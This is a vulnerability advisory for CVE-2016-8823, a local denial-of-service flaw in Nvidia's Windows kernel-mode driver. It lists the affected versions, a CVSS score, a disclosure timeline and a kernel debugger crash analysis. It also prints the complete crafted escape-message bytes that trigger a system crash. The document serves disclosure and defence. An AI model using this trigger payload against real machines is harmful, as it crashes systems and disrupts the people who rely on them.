Nvidia Windows Kernel Mode Driver Denial Of Service(CVE-2016-8823)

2017-10-10T00:00:00
ID SSV:96634
Type seebug
Reporter Root
Modified 2017-10-10T00:00:00

Description

Summary

An local denial of service vulnerability exists in the communication functionality of Nvidia Windows Kernel Mode Driver. A specially crafted message can cause a vulnerability resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.

Tested Versions

(Requires physical machine) - Nvidia Windows Kernel Mode Driver, 372.70 (21.21.13.7270) - Nvidia Windows Kernel Mode Driver, 372.90 (21.21.13.7290)

Product URLs

http://nvidia.com

CVSSv3 Score

5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Details

An local denial of service vulnerability exists in the communication functionality of Nvidia Windows Kernel Mode Driver. A specially crafted D3DKMTEscape message can cause a vulnerability resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability. 0x41, 0x44, 0x56, 0x4E, 0x02, 0x00, 0x01, 0x00, 0x40, 0x01, 0x00, 0x00, 0x2A, 0x2A, 0x56, 0x4E, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x56, 0x00, 0x53, 0x00, 0x50, 0x00, 0x43, 0x00, 0x41, 0x00, 0x50, 0x00, 0x53, 0x00, 0x5C, 0x00, 0x61, 0x00, 0x61, 0x00, 0x31, 0x00, 0x38, 0x00, 0x65, 0x00, 0x62, 0x00, 0x63, 0x00, 0x34, 0x00, 0x2D, 0x00, 0x30, 0x00, 0x31, 0x00, 0x39, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x65, 0x00, 0x63, 0x00, 0x30, 0x00, 0x2D, 0x00, 0x62, 0x00, 0x66, 0x00, 0x31, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x64, 0x00, 0x36, 0x00, 0x33, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00, 0x31, 0x00, 0x38, 0x00, 0x62, 0x00, 0x66, 0x00, 0x35, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9F, 0x21, 0x93, 0x00, 0x32, 0xE1, 0x54, 0x00, 0x00, 0x80, 0x84, 0x1E, 0x00

This bug happens because the ZwSetValueKey API is executed by the Nvidia driver with an invalid argument.

Crash Information

``` 0: kd> !analyze -v


  • *
  • Bugcheck Analysis *
  • *

PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffffd00026a46000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff801b0bcfc20, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved)

Debugging Details:

READ_ADDRESS: ffffd00026a46000

FAULTING_IP: nt!memcpy+a0 fffff801`b0bcfc20 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx]

MM_INTERNAL_CODE: 0

DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT

BUGCHECK_STR: AV

PROCESS_NAME: intel1.exe

CURRENT_IRQL: 0

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre

TRAP_FRAME: ffffd00026a44670 -- (.trap 0xffffd00026a44670) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=ffffc001f8688670 rdx=00000ffe2e3bd988 rsi=0000000000000000 rdi=0000000000000000 rip=fffff801b0bcfc20 rsp=ffffd00026a44808 rbp=00000000000054e1 r8=000000000000000c r9=00000000000001cc r10=ffffe00152d2ae68 r11=ffffc001f8688024 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc nt!memcpy+0xa0: fffff801b0bcfc20 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] ds:ffffd00026a45ff8=???????????????????????????????? Resetting default scope

LAST_CONTROL_TRANSFER: from fffff801b0bde42c to fffff801b0bc33a0

STACK_TEXT: ffffd00026a44408 fffff801b0bde42c : 0000000000000050 ffffd00026a46000 0000000000000000 ffffd00026a44670 : nt!KeBugCheckEx ffffd00026a44410 fffff801b0af2d09 : 0000000000000000 ffffe0015c91b080 ffffd00026a44670 0000000000000000 : nt! ?? ::FNODOBFM::string'+0xab6c ffffd00026a444b0 fffff801b0bcd62f : 0000000000000000 ffffc001f008dfc4 0000000000000000 0000000000000000 : nt!MmAccessFault+0x769 ffffd00026a44670 fffff801b0bcfc20 : fffff801b0f26473 ffffe0015d517301 ffffc00100000006 ffffc001f008dfc4 : nt!KiPageFault+0x12f ffffd00026a44808 fffff801b0f26473 : ffffe0015d517301 ffffc00100000006 ffffc001f008dfc4 ffffd00026a44860 : nt!memcpy+0xa0 ffffd00026a44810 fffff801b0fbcd18 : ffffc001f8688024 0000000000000000 00000000001e8480 ffffc001ee828000 : nt!CmpSetValueDataNew+0x157 ffffd00026a44860 fffff801b0f0f588 : 01d21329ff575fe0 ffffd00026a44991 ffffc001f170fa70 0000002500000003 : nt! ?? ::NNGAKEGL::string'+0x27928 ffffd00026a448d0 fffff801b0e3a977 : ffffc001f7837b50 ffffd00026a44a40 ffffc00100000003 ffffd00026a459ac : nt!CmSetValueKey+0x784 ffffd00026a449e0 fffff801b0bcebb3 : ffffc001ee8763a0 ffffd00026a44c40 0000000000000000 fffff801b0e9bc1e : nt!NtSetValueKey+0x55f ffffd00026a44bb0 fffff801b0bc7020 : fffff8014175a51a 00000000000054e1 ffffd00026a44e31 ffffd00026a459ac : nt!KiSystemServiceCopyEnd+0x13 ffffd00026a44db8 fffff8014175a51a : 00000000000054e1 ffffd00026a44e31 ffffd00026a459ac 00000000000054e1 : nt!KiServiceLinkage ffffd00026a44dc0 fffff8014175a051 : 00000000000054e1 ffffd00026a459ac 00000000000054e1 00000000000054e1 : nvlddmkm+0xb751a ffffd00026a44e80 fffff801417944e7 : fffff80141759fc0 ffffd00026a45870 ffffd00026a450b0 0000000000000140 : nvlddmkm+0xb7051 ffffd00026a44f20 fffff80141763faf : 0000000000000000 fffff801b0dc97e0 ffffe00152d2a080 ffffc001ee803000 : nvlddmkm+0xf14e7 ffffd00026a44f70 fffff80141f44769 : ffffd00026a45508 ffffd00026a450b0 ffffd00026a45870 0000000000000000 : nvlddmkm+0xc0faf ffffd00026a44fb0 fffff80141f39e24 : ffffd00026a45448 ffffd00026a45658 ffffe0015d517080 fffff801b0bcebb3 : nvlddmkm!nvDumpConfig+0x1253a1 ffffd00026a45410 fffff80141f44136 : ffffe0015665a000 ffffd00026a45519 0000000000000000 ffffe00156a96000 : nvlddmkm!nvDumpConfig+0x11aa5c ffffd00026a45450 fffff80141efb43d : ffffd00026a45780 ffffd00026a455e9 ffffd00026a45780 ffffe0015665a000 : nvlddmkm!nvDumpConfig+0x124d6e ffffd00026a45580 fffff801413604f8 : 0000000000000002 ffffe0015c825220 000000004e562a2a 0000000001000003 : nvlddmkm!nvDumpConfig+0xdc075 ffffd00026a45650 fffff801413c5b4e : 0000000000000000 ffffd00026a45b80 ffffd00026a45ad0 fffff80141463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48 ffffd00026a45680 fffff960002d41d3 : ffffe0015a294010 ffffe0015d517080 000000007f82f000 ffffe0015a294010 : dxgkrnl!DxgkEscape+0x802 ffffd00026a45ab0 fffff801b0bcebb3 : ffffe0015d517080 000000007f82d000 000000000013fdb0 0000000000000000 : win32k!NtGdiDdDDIEscape+0x53 ffffd00026a45b00 00000000773d74aa : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : nt!KiSystemServiceCopyEnd+0x13 000000000013dfd8 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : 0x773d74aa

STACK_COMMAND: kb

FOLLOWUP_IP: nvlddmkm+b751a fffff801`4175a51a 85c0 test eax,eax

SYMBOL_STACK_INDEX: b

SYMBOL_NAME: nvlddmkm+b751a

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: nvlddmkm

IMAGE_NAME: nvlddmkm.sys

DEBUG_FLR_IMAGE_TIMESTAMP: 57bf5593

FAILURE_BUCKET_ID: AV_nvlddmkm+b751a

BUCKET_ID: AV_nvlddmkm+b751a

ANALYSIS_SOURCE: KM

FAILURE_ID_HASH_STRING: km:av_nvlddmkm+b751a

FAILURE_ID_HASH: {4bb56d14-bad0-e413-eed6-722441b0442f}

Followup: MachineOwner

```

Timeline

  • 2016-09-30 - Initial Discovery
  • 2016-10-17 - Vendor Notification
  • 2016-12-14 - Public Disclosure